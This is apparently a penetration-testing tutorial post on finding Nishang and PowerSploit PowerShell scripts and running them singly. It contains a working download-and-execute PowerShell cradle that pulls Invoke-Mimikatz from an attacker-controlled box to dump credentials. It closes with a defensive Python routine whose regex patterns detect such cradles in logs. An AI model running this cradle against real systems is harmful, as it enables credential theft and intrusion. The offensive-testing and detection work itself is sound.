Day 76: Use Nishang/Empire and Other Ps1 Scripts ‘Manually’.
Find Interesting Scripts
First, we want to figure out what we have after installing Nishang, Empire and other offensive PowerShell testing frameworks. To do this, just try the following (the pattern is quoted so the shell does not expand it against the current directory; if the list looks stale, run updatedb first):
locate '*.ps1'
You should have something like this excerpt taken from one of my lab VMs…
...
/usr/share/nishang/Backdoors/Add-RegBackdoor.ps1
/usr/share/nishang/Backdoors/Add-ScrnSaveBackdoor.ps1
/usr/share/nishang/Backdoors/DNS_TXT_Pwnage.ps1
/usr/share/nishang/Backdoors/Execute-OnTime.ps1
/usr/share/nishang/Backdoors/Gupt-Backdoor.ps1
/usr/share/nishang/Backdoors/HTTP-Backdoor.ps1
/usr/share/nishang/Backdoors/Invoke-ADSBackdoor.ps1
/usr/share/nishang/Backdoors/Set-RemotePSRemoting.ps1
/usr/share/nishang/Backdoors/Set-RemoteWMI.ps1
/usr/share/nishang/Bypass/Invoke-AmsiBypass.ps1
/usr/share/nishang/Client/Out-CHM.ps1
/usr/share/nishang/Client/Out-Excel.ps1
/usr/share/nishang/Client/Out-HTA.ps1
/usr/share/nishang/Client/Out-JS.ps1
/usr/share/nishang/Client/Out-Java.ps1
/usr/share/nishang/Client/Out-SCF.ps1
/usr/share/nishang/Client/Out-SCT.ps1
/usr/share/nishang/Client/Out-Shortcut.ps1
/usr/share/nishang/Client/Out-WebQuery.ps1
/usr/share/nishang/Client/Out-Word.ps1
/usr/share/nishang/Escalation/Enable-DuplicateToken.ps1
/usr/share/nishang/Escalation/Invoke-PsUACme.ps1
/usr/share/nishang/Escalation/Remove-Update.ps1
/usr/share/nishang/Execution/Download-Execute-PS.ps1
/usr/share/nishang/Execution/Download_Execute.ps1
/usr/share/nishang/Execution/Execute-Command-MSSQL.ps1
/usr/share/nishang/Execution/Execute-DNSTXT-Code.ps1
/usr/share/nishang/Execution/Out-RundllCommand.ps1
/usr/share/nishang/Gather/Check-VM.ps1
/usr/share/nishang/Gather/Copy-VSS.ps1
/usr/share/nishang/Gather/FireBuster.ps1
/usr/share/nishang/Gather/FireListener.ps1
/usr/share/nishang/Gather/Get-Information.ps1
/usr/share/nishang/Gather/Get-LSASecret.ps1
/usr/share/nishang/Gather/Get-PassHashes.ps1
/usr/share/nishang/Gather/Get-PassHints.ps1
/usr/share/nishang/Gather/Get-WLAN-Keys.ps1
/usr/share/nishang/Gather/Get-WebCredentials.ps1
/usr/share/nishang/Gather/Invoke-CredentialsPhish.ps1
/usr/share/nishang/Gather/Invoke-Mimikatz.ps1
/usr/share/nishang/Gather/Invoke-MimikatzWDigestDowngrade.ps1
/usr/share/nishang/Gather/Invoke-Mimikittenz.ps1
/usr/share/nishang/Gather/Invoke-SSIDExfil.ps1
/usr/share/nishang/Gather/Invoke-SessionGopher.ps1
/usr/share/nishang/Gather/Keylogger.ps1
/usr/share/nishang/Gather/Show-TargetScreen.ps1
/usr/share/nishang/MITM/Invoke-Interceptor.ps1
/usr/share/nishang/Misc/Speak.ps1
/usr/share/nishang/Pivot/Create-MultipleSessions.ps1
/usr/share/nishang/Pivot/Invoke-NetworkRelay.ps1
/usr/share/nishang/Pivot/Run-EXEonRemote.ps1
/usr/share/nishang/Prasadhak/Invoke-Prasadhak.ps1
/usr/share/nishang/Scan/Invoke-BruteForce.ps1
/usr/share/nishang/Scan/Invoke-PortScan.ps1
/usr/share/nishang/Shells/Invoke-JSRatRegsvr.ps1
/usr/share/nishang/Shells/Invoke-JSRatRundll.ps1
/usr/share/nishang/Shells/Invoke-PoshRatHttp.ps1
/usr/share/nishang/Shells/Invoke-PoshRatHttps.ps1
/usr/share/nishang/Shells/Invoke-PowerShellIcmp.ps1
/usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1
/usr/share/nishang/Shells/Invoke-PowerShellTcpOneLine.ps1
/usr/share/nishang/Shells/Invoke-PowerShellTcpOneLineBind.ps1
/usr/share/nishang/Shells/Invoke-PowerShellUdp.ps1
/usr/share/nishang/Shells/Invoke-PowerShellUdpOneLine.ps1
/usr/share/nishang/Shells/Invoke-PowerShellWmi.ps1
/usr/share/nishang/Shells/Invoke-PsGcat.ps1
/usr/share/nishang/Shells/Invoke-PsGcatAgent.ps1
/usr/share/nishang/Shells/Remove-PoshRat.ps1
/usr/share/nishang/Utility/Add-Exfiltration.ps1
/usr/share/nishang/Utility/Add-Persistence.ps1
/usr/share/nishang/Utility/Base64ToString.ps1
/usr/share/nishang/Utility/ConvertTo-ROT13.ps1
/usr/share/nishang/Utility/Do-Exfiltration.ps1
/usr/share/nishang/Utility/Download.ps1
/usr/share/nishang/Utility/ExetoText.ps1
/usr/share/nishang/Utility/Invoke-Decode.ps1
/usr/share/nishang/Utility/Invoke-Encode.ps1
/usr/share/nishang/Utility/Out-DnsTxt.ps1
/usr/share/nishang/Utility/Parse_Keys.ps1
/usr/share/nishang/Utility/Remove-Persistence.ps1
/usr/share/nishang/Utility/Start-CaptureServer.ps1
/usr/share/nishang/Utility/StringToBase64.ps1
/usr/share/nishang/Utility/TexttoExe.ps1
/usr/share/powersploit/AntivirusBypass/Find-AVSignature.ps1
/usr/share/powersploit/CodeExecution/Invoke-DllInjection.ps1
/usr/share/powersploit/CodeExecution/Invoke-Shellcode.ps1
/usr/share/powersploit/CodeExecution/Invoke-ShellcodeMSIL.ps1
/usr/share/powersploit/CodeExecution/Watch-BlueScreen.ps1
/usr/share/powersploit/Exfiltration/Get-GPPPassword.ps1
/usr/share/powersploit/Exfiltration/Get-Keystrokes.ps1
/usr/share/powersploit/Exfiltration/Get-TimedScreenshot.ps1
/usr/share/powersploit/Exfiltration/Out-Minidump.ps1
/usr/share/powersploit/PETools/Get-DllLoadPath.ps1
/usr/share/powersploit/PETools/Get-ObjDump.ps1
/usr/share/powersploit/PETools/Get-PEHeader.ps1
/usr/share/powersploit/Persistence/Add-Persistence.ps1
/usr/share/powersploit/Persistence/New-UserPersistenceOptions.ps1
/usr/share/powersploit/Recon/Get-HttpStatus.ps1
/usr/share/powersploit/Recon/Invoke-Portscan.ps1
/usr/share/powersploit/Recon/Invoke-ReverseDnsLookup.ps1
/usr/share/powersploit/ReverseEngineering/ConvertTo-String.ps1
/usr/share/powersploit/ReverseEngineering/Get-ILDisassembly.ps1
/usr/share/powersploit/ReverseEngineering/Get-Member.ps1
/usr/share/powersploit/ReverseEngineering/Get-MethodAddress.ps1
/usr/share/powersploit/ReverseEngineering/Get-PEB.ps1
/usr/share/powersploit/ReverseEngineering/Get-Strings.ps1
/usr/share/powersploit/ReverseEngineering/Get-StructFromMemory.ps1
/usr/share/powersploit/ReverseEngineering/New-Object.ps1
/usr/share/powersploit/ScriptModification/Out-CompressedDll.ps1
/usr/share/powersploit/ScriptModification/Out-EncodedCommand.ps1
/usr/share/powersploit/ScriptModification/Out-EncryptedScript.ps1
/usr/share/powersploit/ScriptModification/Remove-Comments.ps1
...
Some of those things sound awesome, right? Code Execution, Persistence, Pivot, Exfil and much more; this is enough to get any offensive security tester wet around the lips. But what if we don't want to use a full framework and we just want to run a single command? Try this to download and run at the same time.
Example with Mimikatz
Mimikatz we know well, but others not so much. In those cases it's important that we see what a script does before we run it, or it might get us noticed, kill our shell or, worse, BSOD the box. So we should be careful and check the code first.
less /usr/share/nishang/Gather/Invoke-Mimikatz.ps1
You will generally see something like this…
function Invoke-Mimikatz
{
<#
.SYNOPSIS

This script loads Mimikatz completely in memory.

.DESCRIPTION

This script leverages Mimikatz 2.1.1 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as
dump credentials without ever writing the mimikatz binary to disk.
The script has a ComputerName parameter which allows it to be executed against multiple computers using PowerShell remoting.
This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed.

Reflectively loads Mimikatz 2.1.1 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any
functionality provided with Mimikatz.

The script, in near future, will provide additional commands for a variety of attacks possible with Mimikatz.

Function: Invoke-Mimikatz
Author: Joe Bialek, Twitter: @JosephBialek
Mimikatz Author: Benjamin DELPY `gentilkiwi`. Blog: http://blog.gentilkiwi.com. Email: benjamin@gentilkiwi.com. Twitter @gentilkiwi
License: http://creativecommons.org/licenses/by/3.0/fr/
Required Dependencies: Mimikatz (included)
Optional Dependencies: None
Mimikatz version: 2.1.1 (13/08/2017)

.PARAMETER DumpCreds

Switch: Use mimikatz to dump credentials out of LSASS.

.PARAMETER DumpCerts

Switch: Use mimikatz to export all private certificates (even if they are marked non-exportable).
...
The most important line is this…
function Invoke-Mimikatz
Always check this. Some people are not consistent with naming conventions and you might have to use your head, but for those who don't know: the function name is what you need to call to invoke the script once it has been loaded.
The rest of the script gives you info, parameter descriptions and other examples of running the script.
For us, all we need to do to download this file and execute it is this one line…
Pentest Box (run this from the directory containing Invoke-Mimikatz.ps1, since the server serves the current directory; on Python 3 the equivalent is python3 -m http.server 80)
python -m SimpleHTTPServer 80
Windows Shell (replace $PENTEST_BOX_IP with the address of your pentest box)
powershell -exec bypass -command "IEX (New-Object System.Net.WebClient).DownloadString('http://$PENTEST_BOX_IP/Invoke-Mimikatz.ps1');Invoke-Mimikatz"
In your Windows terminal you will see the output from the script; it really is that easy. Now spend some time looking at .ps1 scripts and seeing what you can do. PowerShell is dying in some of the more secure corporate environments, but for the rest, PowerShell is still a titan of pwnage, a gift that keeps on giving.
Of course, some scripts need elevated privileges, so I ran this in an admin prompt to show the one-liner in action. This can be delivered from anywhere: web shells, command injection, low-privilege shells, etc.
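The flip side of "it really is that easy" is that the one-liner above is a textbook PowerShell download cradle, and every piece of it (the execution-policy bypass, IEX, New-Object System.Net.WebClient, DownloadString and the remote URL) lands in process command-line logging and PowerShell script block logging, which is exactly what the blue team keys on. As an added example that is not from the original post or from any of the frameworks it lists, here is a small Python triage routine run over constructed log lines; the indicator names, weights, threshold and the 192.0.2.10 documentation address are my own choices.

```python
import re
from typing import List, Tuple

# Constructed sample events (not real telemetry). Each tuple is a source label
# and the text a SIEM would keep: a process command line or a PowerShell
# script block. 192.0.2.10 is a documentation (TEST-NET-2) address.
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    ("process_cmdline", "powershell -exec bypass -command \"IEX (New-Object System.Net.WebClient)"
                        ".DownloadString('http://192.0.2.10/Invoke-Mimikatz.ps1');Invoke-Mimikatz\""),
    ("script_block", "Get-ChildItem C:\\Users | Select-Object Name"),
    ("script_block", "iex (new-object net.webclient).downloadstring('http://192.0.2.10/x.ps1')"),
    ("process_cmdline", "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\Backup.ps1"),
]

# Indicator name -> (pattern, weight). Weights are a constructed tuning choice:
# the two halves of a download cradle (IEX plus a WebClient download) weigh
# most, while an execution-policy bypass on its own is common in legitimate
# admin scripting and should not page anyone by itself.
INDICATORS = {
    "exec_policy_bypass": (re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I), 1),
    "invoke_expression":  (re.compile(r"(?<![\w-])(?:iex|invoke-expression)\b", re.I), 2),
    "webclient_download": (re.compile(r"\.download(?:string|file|data)\s*\(", re.I), 2),
    "net_webclient":      (re.compile(r"new-object\s+(?:system\.)?net\.webclient", re.I), 1),
    "remote_url":         (re.compile(r"https?://", re.I), 1),
}

ALERT_THRESHOLD = 3


def score_event(text: str) -> dict:
    """Match every indicator against one event and return the hits, the summed
    weight, and whether the IEX-plus-download combination is present."""
    hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(text)]
    return {
        "hits": hits,
        "score": sum(INDICATORS[h][1] for h in hits),
        "download_cradle": "invoke_expression" in hits and "webclient_download" in hits,
    }


def triage(events: List[Tuple[str, str]]) -> List[dict]:
    """Return only the events worth an analyst's time: a full download cradle,
    or enough weaker indicators together to cross the threshold."""
    findings = []
    for source, text in events:
        result = score_event(text)
        if result["download_cradle"] or result["score"] >= ALERT_THRESHOLD:
            findings.append({"source": source, "text": text, **result})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f['source']}] score={f['score']} cradle={f['download_cradle']} hits={f['hits']}")
```

On the constructed events, both cradle variants are flagged regardless of case or whether "System." is spelled out, the plain Get-ChildItem line produces no hits, and the signed-script-with-bypass line scores 1 and stays below the threshold; that last case is the reason to weight the combination rather than any single token, and it is also why the cradle is so often rewritten into less obvious forms, which is an argument for script block logging rather than command-line matching alone.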